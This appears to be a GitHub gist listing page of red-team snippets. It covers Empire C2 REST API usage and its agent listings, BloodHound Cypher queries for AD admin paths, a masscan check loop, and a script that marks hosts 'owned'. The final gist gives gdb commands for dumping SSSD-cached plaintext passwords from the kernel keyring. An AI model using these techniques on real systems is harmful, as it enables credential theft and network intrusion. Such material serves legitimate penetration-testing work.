Skip to content

Instantly share code, notes, and snippets.

View jeffmcjunkin's full-sized avatar

Jeff McJunkin jeffmcjunkin

View GitHub Profile
@jeffmcjunkin
jeffmcjunkin / gist:8c65d438ae3aee8cf10b0e380776cd71
Last active May 17, 2017 00:28
Empire REST API Python client proposal
# start empire headless with the specified API username and password
./empire --headless --username empireadmin --password 'Password123!'
# login and the current server token
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/admin/login -X POST -d '{"username":"empireadmin", "password":"Password123!"}'
empire.login
# store the token in a variable
TOKEN=<API_token>
@jeffmcjunkin
jeffmcjunkin / gist:d852b43cd560e4548eb690e74c4fd26b
Created May 15, 2017 23:10
Empire REST response for `curl --insecure -i https://localhost:1337/api/listeners/options?token=$TOKEN`
{
"listeneroptions": [
{
"CertPath": {
"Description": "Certificate path for https listeners.",
"Required": false,
"Value": ""
},
"DefaultDelay": {
"Description": "Agent delay/reach back interval (in seconds).",
@jeffmcjunkin
jeffmcjunkin / gist:6ca39fae82c38a90a05902368118c881
Created May 15, 2017 23:24
Empire REST response for `curl --insecure -i https://localhost:1337/api/agents?token=$TOKEN`
{
"agents": [
{
"ID": 1,
"checkin_time": "2017-05-15 16:17:21",
"children": null,
"delay": 5,
"external_ip": "172.16.187.135",
"functions": null,
"headers": "",
@jeffmcjunkin
jeffmcjunkin / check-masscan-results.sh
Last active November 20, 2019 00:37
Look, it got the job done, okay?
for rate in 100 1000 10000 20000 40000 100000; do for attempt in $(seq 1 5); do echo -n "Rate: $rate / Attempt: $attempt - "; responses=$(grep 'state state="open" reason=' /tmp/DO-masscan-${rate}.${attempt}.xml | cut -d" " -f3- | sort -u | wc -l); echo "scale=5; 100 * (1 - ( $responses /50001))" | bc; done; done
@jeffmcjunkin
jeffmcjunkin / gist:7b4a67bb7dd0cfbfbd83768f3aa6eb12
Last active November 12, 2023 16:35
Useful Cypher queries for BloodHound
MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer
RETURN u.name
That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
---------------
MATCH
(U:User)-[r:MemberOf|:AdminTo*1..]->(C:Computer)
WITH
U.name as n,
#!/usr/bin/env python
import getpass
import os, stat
from neo4j import GraphDatabase, basic_auth
import sys
def set_computer_owned(computer):
with driver.session() as session:
session.run("MATCH (c:Computer) "
"WHERE LOWER(c.name) = LOWER({computer}) " # Index-preserving case-insensitive search from https://stackoverflow.com/a/41489087/372377
@jeffmcjunkin
jeffmcjunkin / gist:d5fb8dbf15cbd5d37a77fafccda4d969
Created October 6, 2020 14:53
Retrieving SSSD plain text passwords (krb5_store_password_if_offline)
for who ever this interest, if you enable krb5_store_password_if_offline in the SSSD configuration, the AD password for accounts is stored in plaintext in the kernel keyring
to dump the clear text password you can do :
```
gdb -p <PID_OF_SSSD>
call system("keyctl show > /tmp/output")
```
From the /tmp/output locate the key_id for the user you want
Example of an output is :